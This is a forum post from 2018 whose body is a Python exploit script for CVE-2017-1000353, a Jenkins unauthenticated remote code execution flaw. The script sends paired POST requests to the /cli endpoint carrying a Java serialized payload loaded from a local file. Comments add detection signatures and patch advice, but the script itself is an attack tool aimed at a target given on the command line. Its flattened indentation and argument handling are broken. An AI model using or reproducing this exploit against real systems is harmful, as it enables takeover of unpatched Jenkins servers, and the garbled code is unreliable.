hhajhh 发表于 2018-1-9 07:33:15

Jenkins Unauthenticated Remote Code Execution

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CVE-2017-1000353
# Author: f0rsaken

  
import requests
  
import sys
  
import threading
  
import time
  
import uuid
  

  
# Module-level constants shared by both HTTP requests below.
# The Base64 text starting with "rO0AB" is the encoded form of a Java
# serialization stream header (bytes AC ED 00 05); here it names the class
# hudson.remoting.Capability. For defenders, "rO0AB" or the raw AC ED 00 05
# magic in a request body sent to /cli is a practical inspection signature.
PREAMBLE = "<======>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\x00\x00\x00\x00"
  
# Serialized Java object read from a local file at import time; its contents
# are not shown on this page. The underlying weakness is that the server
# deserializes client-supplied objects before authenticating the client, so
# the durable fix is the vendor patch for CVE-2017-1000353, not input filtering.
SER = open("Payload.ser", "rb").read()
  
# One random UUID per run; both requests carry it in the Session header so the
# server can pair them as two halves of the same connection.
SESSION = str(uuid.uuid4())
  

  
# Send the "download" half of the two-request exchange: a POST with no body
# whose headers carry Side=download and the shared Session value.
# Detection note: an unauthenticated POST to /cli carrying a "Side" header and
# a UUID "Session" header is visible in reverse-proxy or web-server access logs
# when request headers are recorded.
def download(url, session):
  headers = {"Side": "download", "Session": session}
  try:
  r = requests.post(url, headers=headers, timeout=5)
  except requests.RequestException as e:
  # Every requests-level failure (including the 5 s timeout) is discarded;
  # the response object r is never inspected either.
  pass
  

  
# Send the "upload" half: a POST with Side=upload, the same Session value, and
# `data` as the request body. Exceptions are not caught here; the caller
# handles requests.RequestException.
# Mitigation note: apply the Jenkins security update that addresses
# CVE-2017-1000353, and limit which networks can reach the controller's /cli
# endpoint; alert on a download/upload pair sharing one Session value from a
# client that has not authenticated.
def upload(url, session, data):
  headers = {"Side": "upload", "Session": session}
  # The response is assigned but never checked, so nothing here tells the
  # caller how the server reacted.
  r = requests.post(url, data=data, headers=headers, timeout=5)
  

  
# Drive the two-request exchange against http://<target>/cli (plain HTTP).
# Returns `target` when the upload request raises no requests exception and
# False when it does. The return value reflects only that the HTTP call
# completed; the code never examines any server response.
def exploit(target):
  URL = "http://" + target + "/cli"
  

  # The download request runs on its own thread; the one-second pause
  # presumably lets it reach the server before the upload is sent.
  threading.Thread(target=download, args=(URL, SESSION)).start()
  time.sleep(1.0)
  

  try:
  # Request body is the preamble string followed by the serialized object
  # loaded from Payload.ser.
  upload(URL, SESSION, PREAMBLE+SER)
  except requests.RequestException as e:
  return False
  else:
  return target
  

  
# Command-line entry point: reads the target from sys.argv, calls exploit()
# and prints what it returns. The except branch handles IndexError by printing
# the banner string.
def main():
  try:
  target = sys.argv
  except IndexError as e:
  print("Jenkins Unauthenticated Remote Code Execution")
  else:
  result = exploit(target)
  print(result)
  

  
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
  main()